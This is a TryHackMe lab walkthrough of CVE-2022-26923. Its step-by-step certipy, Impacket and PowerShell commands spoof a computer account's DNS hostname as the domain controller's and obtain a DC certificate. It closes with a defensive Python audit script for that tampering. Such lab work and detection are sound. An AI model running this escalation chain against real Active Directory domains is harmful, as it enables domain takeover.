Hello!
Today we'll be covering CVE-2022-26923.
CVSS v3
- Base score: 8.8
- Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- Severity: High
Welcome to the CVE-2022-26923 TryHackMe walkthrough. Today I decided to learn about Active Directory Certificate Services and I consider that this walkthrough was a great occasion. I discovered certipy and practiced with nmap and Impacket's addcomputer.py.
🔗 Link to the walkthrough: https://tryhackme.com/r/room/cve202226923
🟡 Difficulty: Easy
⚙️ Tools: nmap, certipy, Impacket's addcomputer.py
💭 Note: $Target_IP = the machine's IP
Certain screenshots were intentionally omitted. I really encourage you to drop a comment should you need support or just to say print("Hello world"). 😄
On my GitHub you'll find more info about Microsoft ADCS.
🪜 Steps I followed (after deploying the machine):

Add the DNS name and the machine IP to /etc/hosts.

Run an nmap scan:

```shell
nmap -A -Pn $Target_IP
```

Ports 88 and 389 are open.
- 88 is used by the Kerberos authentication system.
- 389 is used for LDAP connections so users can access protected network resources. Connections made through this port are unencrypted.

Get the Enterprise CA name:

```shell
certipy find -u thm@lunar.eruca.com -p Password1@ -dc-ip $Target_IP
```

Test certificate generation:

```shell
certipy req -username thm@lunar.eruca.com -password Password1@ -ca LUNAR-LUNDC-CA -target $Target_IP
```

Verify that this certificate is valid and can be used for Kerberos authentication:

```shell
certipy auth -pfx thm.pfx
```

Add a computer to the domain:

```shell
python3 addcomputer.py 'lunar.eruca.com/thm:Password1@' -method LDAPS -computer-name 'THMPC' -computer-pass 'Password1@' -dc-ip $Target_IP
```

Generate a certificate for the newly created computer:

```shell
certipy req -username THMPC$ -password Password1@ -ca LUNAR-LUNDC-CA -target $Target_IP -template Machine
```

Verify that the certificate is valid:

```shell
certipy auth -pfx thmpc.pfx
```

SSH into the machine:

```shell
ssh lunar.eruca.com\\thm@lundc
```

Start PowerShell:

```shell
powershell
```

Get the current attributes from our computer AD object:

```powershell
Get-ADComputer THMPC -properties dnshostname,serviceprincipalname
```

Clear the service principal names on our computer object (the SPNs derived from the old hostname would otherwise conflict with the DC's when the DNS hostname is changed):

```powershell
Set-ADComputer THMPC -ServicePrincipalName @{}
```

Set the DNS hostname attribute to that of the DC:

```powershell
Set-ADComputer THMPC -DnsHostName LUNDC.lunar.eruca.com
```

Verify that the changes were made:

```powershell
Get-ADComputer THMPC -properties dnshostname,serviceprincipalname
```

Forge a malicious certificate:
- Request a new certificate:

```shell
certipy req -username THMPC$ -password Password1@ -ca LUNAR-LUNDC-CA -target lundc.lunar.eruca.com -template Machine
```

- Verify the certificate:

```shell
certipy auth -pfx lundc.pfx
```

And we have the flag!
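The whole chain rests on a computer object whose dNSHostName was pointed at the DC and whose SPNs were wiped, so the defender-side check is an audit of exactly those attributes. Below is an added example (not from the room or this walkthrough) in Python: it runs over constructed records shaped like the Get-ADComputer output above; the domain name and the sample objects are assumptions.

```python
# Added example: audit computer objects for the dNSHostName / SPN tampering that
# CVE-2022-26923 relies on. Records are constructed to mirror the walkthrough;
# in practice feed it an export of Get-ADComputer with the same properties.
from collections import defaultdict

DOMAIN = "lunar.eruca.com"  # assumed: the walkthrough's domain

# Constructed sample: the DC, the rogue THMPC$ after the Set-ADComputer steps,
# and one healthy workstation.
SAMPLE_COMPUTERS = [
    {"sAMAccountName": "LUNDC$", "dNSHostName": "LUNDC.lunar.eruca.com",
     "servicePrincipalName": ["HOST/LUNDC", "HOST/LUNDC.lunar.eruca.com"]},
    {"sAMAccountName": "THMPC$", "dNSHostName": "LUNDC.lunar.eruca.com",
     "servicePrincipalName": []},
    {"sAMAccountName": "WS01$", "dNSHostName": "WS01.lunar.eruca.com",
     "servicePrincipalName": ["HOST/WS01", "TERMSRV/WS01.lunar.eruca.com:3389"]},
]


def expected_dns_hostname(sam_account_name, domain=DOMAIN):
    """A computer named THMPC$ should carry dNSHostName thmpc.<domain>."""
    return f"{sam_account_name.rstrip('$')}.{domain}".lower()


def spn_host(spn):
    """HOST/LUNDC.lunar.eruca.com:port -> lundc.lunar.eruca.com"""
    return spn.split("/", 1)[1].split(":", 1)[0].lower()


def audit_computers(computers, domain=DOMAIN):
    """Return (account, reason, value) findings for suspicious computer objects."""
    findings = []
    claimed = defaultdict(list)  # dNSHostName -> accounts claiming it
    for c in computers:
        sam = c["sAMAccountName"]
        short = sam.rstrip("$").lower()
        dns = (c.get("dNSHostName") or "").lower()
        spns = c.get("servicePrincipalName") or []
        if dns:
            claimed[dns].append(sam)
            if dns != expected_dns_hostname(sam, domain):
                findings.append((sam, "dNSHostName does not match sAMAccountName", dns))
        if not spns:  # Set-ADComputer -ServicePrincipalName @{} leaves exactly this
            findings.append((sam, "no servicePrincipalName values", dns))
        for spn in spns:
            if spn_host(spn) not in (short, expected_dns_hostname(sam, domain)):
                findings.append((sam, "SPN host does not match account", spn))
    for dns, accounts in claimed.items():
        if len(accounts) > 1:  # two objects cannot legitimately be the same host
            findings.append((", ".join(sorted(accounts)),
                             "dNSHostName claimed by multiple accounts", dns))
    return findings


if __name__ == "__main__":
    for account, reason, value in audit_computers(SAMPLE_COMPUTERS):
        print(f"{account}: {reason} ({value})")
```

Run against the sample, the rogue THMPC$ is reported three times (mismatched dNSHostName, empty SPN list, and the DC's hostname claimed twice) while LUNDC$ and WS01$ are clean.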